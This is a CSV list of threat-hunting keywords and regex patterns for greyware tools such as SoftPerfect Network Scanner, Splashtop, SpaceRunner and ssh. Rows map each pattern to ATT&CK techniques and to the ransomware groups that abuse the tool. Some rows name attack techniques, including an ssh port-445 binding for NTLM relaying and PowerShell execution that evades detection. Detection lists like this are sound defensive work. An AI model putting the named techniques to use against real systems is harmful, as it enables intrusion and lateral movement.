"*\netscan_portable\*",".{0,1000}\\netscan_portable\\.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan_setup.exe*",".{0,1000}\\netscan_setup\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan_setup.tmp*",".{0,1000}\\netscan_setup\.tmp.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\netscan64.exe*",".{0,1000}\\netscan64\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*\SoftPerfect Network Scanner\*",".{0,1000}\\SoftPerfect\sNetwork\sScanner\\.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*<Data Name=""RelativeTargetName"">delete.me<*",".{0,1000}\<Data\sName\=\""RelativeTargetName\""\>delete\.me\<.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com.cach3.com/board/read.php%3F12,10134,12202.html","1","0","N/A","risk of false positive","8","10","N/A","N/A","N/A","N/A"
"*>SoftPerfect Network Scanner<*",".{0,1000}\>SoftPerfect\sNetwork\sScanner\<.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","#productname","N/A","8","10","N/A","N/A","N/A","N/A"
"*87e8486846df3005c1b481b1c5205f661b715addfda262f56d2a41892126b399*",".{0,1000}87e8486846df3005c1b481b1c5205f661b715addfda262f56d2a41892126b399.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","#filehash","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://www.softperfect.com/download/files/netscan*",".{0,1000}https\:\/\/www\.softperfect\.com\/download\/files\/netscan.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*https://www.softperfect.com/products/networkscanner/?from=nver*",".{0,1000}https\:\/\/www\.softperfect\.com\/products\/networkscanner\/\?from\=nver.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*netscan.exe /*",".{0,1000}netscan\.exe\s\/.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*netscan_portable.zip*",".{0,1000}netscan_portable\.zip.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","1","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*SoftPerfect_*Patch_Keygen_v2*.exe*",".{0,1000}SoftPerfect_.{0,1000}Patch_Keygen_v2.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","softperfect networkscanner","SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell","T1046 - T1065 - T1135 ","TA0007 ","N/A","BlackSuit - Royal - Black Basta - Akira - LockBit - BianLian - Conti - BlackCat - Dagon Locker - Nokoyawa - Trigona - Hive - BlackByte - RansomHub - Cactus - Fog - Medusa - Avaddon","Discovery","https://www.softperfect.com/products/networkscanner/","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A"
"*apcfdffemoinopelidncddjbhkiblecc*",".{0,1000}apcfdffemoinopelidncddjbhkiblecc.{0,1000}","greyware_tool_keyword","Soul VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*/spacerunner.exe*",".{0,1000}\/spacerunner\.exe.{0,1000}","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","188","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
"*\spacerunner.exe*",".{0,1000}\\spacerunner\.exe.{0,1000}","greyware_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","N/A","7","2","188","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z"
"*.api.splashtop.com*",".{0,1000}\.api\.splashtop\.com.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.relay.splashtop.com*",".{0,1000}\.relay\.splashtop\.com.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Library/Logs/SPLog.txt*",".{0,1000}\/Library\/Logs\/SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/SplashtopStreamer/SPLog.txt*",".{0,1000}\/SplashtopStreamer\/SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\slave\workspace\GIT_WIN_SRS_Formal\Source\irisserver\*",".{0,1000}\\slave\\workspace\\GIT_WIN_SRS_Formal\\Source\\irisserver\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Splashtop Remote\*",".{0,1000}\\Splashtop\sRemote\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Splashtop\Temp\*",".{0,1000}\\Splashtop\\Temp\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Splashtop\Temp\log\FTCLog.txt*",".{0,1000}\\Splashtop\\Temp\\log\\FTCLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SRService.exe*",".{0,1000}\\SRService\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\strwinclt.exe*",".{0,1000}\\strwinclt\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\WOW6432Node\Splashtop Inc.\Splashtop Remote Server*",".{0,1000}\\WOW6432Node\\Splashtop\sInc\.\\Splashtop\sRemote\sServer.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*CurrentVersion\Uninstall\Splashtop Inc.\*",".{0,1000}CurrentVersion\\Uninstall\\Splashtop\sInc\.\\.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files (x86)\Splashtop*",".{0,1000}Program\sFiles\s\(x86\)\\Splashtop.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Software\Splashtop Inc.\Splashtop*",".{0,1000}Software\\Splashtop\sInc\.\\Splashtop.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop Remote\Server\log\agent_log.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\agent_log\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop Remote\Server\log\SPLog.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\SPLog\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop Remote\Server\log\svcinfo.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\svcinfo\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop Remote\Server\log\sysinfo.txt*",".{0,1000}Splashtop\sRemote\\Server\\log\\sysinfo\.txt.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop_Streamer_Windows_*.exe*",".{0,1000}Splashtop_Streamer_Windows_.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Splashtop-Splashtop Streamer-*",".{0,1000}Splashtop\-Splashtop\sStreamer\-.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SplashtopStreamer.*.exe*",".{0,1000}SplashtopStreamer\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://ruler-project.github.io/ruler-project/RULER/remote/Splashtop/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SplashtopStreamer3500.exe* prevercheck *",".{0,1000}SplashtopStreamer3500\.exe.{0,1000}\sprevercheck\s.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*www.splashtop.com/remotecaRemoveVRootsISCHECKFORPRODUCTUPDATES*",".{0,1000}www\.splashtop\.com\/remotecaRemoveVRootsISCHECKFORPRODUCTUPDATES.{0,1000}","greyware_tool_keyword","Splashtop","control remote machines- abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","Black Basta - LockBit - AvosLocker - BianLian - Scattered Spider* - Hive - Quantum - Conti - Trigona - RansomHub - Cactus","RMM","https://hybrid-analysis.com/sample/18c10b0235bd341e065ac5c53ca04b68eaeacd98a120e043fb4883628baf644e/6267eb693836e7217b1a3c72","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"ss -lntp*","ss\s\-lntp.{0,1000}","greyware_tool_keyword","ss","replace netstat command - service listening","T1049 - T1040","TA0007 - TA0009","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A"
"*bad client public DH value*",".{0,1000}bad\sclient\spublic\sDH\svalue.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*Corrupted MAC on input*",".{0,1000}Corrupted\sMAC\son\sinput.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*error in libcrypto*",".{0,1000}error\sin\slibcrypto.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*fatal: buffer_get_string: bad string*",".{0,1000}fatal\:\sbuffer_get_string\:\sbad\sstring.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*invalid certificate signing key*",".{0,1000}invalid\scertificate\ssigning\skey.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*invalid elliptic curve value*",".{0,1000}invalid\selliptic\scurve\svalue.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*Local: crc32 compensation attack*",".{0,1000}Local\:\scrc32\scompensation\sattack.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*nano /etc/ssh/sshd_config*",".{0,1000}nano\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*ssh.exe -L 0.0.0.0:445:127.0.0.1:445 *",".{0,1000}ssh\.exe\s\-L\s0\.0\.0\.0\:445\:127\.0\.0\.1\:445\s.{0,1000}","greyware_tool_keyword","ssh","Binding to port 445 on Windows with ssh - useful for NTLM relaying","T1090.002 - T1071.001","TA0008","N/A","N/A","Lateral Movement","https://x.com/0x64616e/status/1817149974724956286","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*unexpected bytes remain after decoding*",".{0,1000}unexpected\sbytes\sremain\safter\sdecoding.{0,1000}","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","N/A","greyware tool - risks of False positive !","N/A","10","4398","1030","2024-06-06T14:56:10Z","2013-09-17T17:07:58Z"
"*vim /etc/ssh/sshd_config*",".{0,1000}vim\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*/dropbear-sshj.git*",".{0,1000}\/dropbear\-sshj\.git.{0,1000}","greyware_tool_keyword","SSH-J.com","This is Dropbear SSH server modified to be used as a public SSH jump & port forwarding service","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://bitbucket.org/ValdikSS/dropbear-sshj/src/master/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
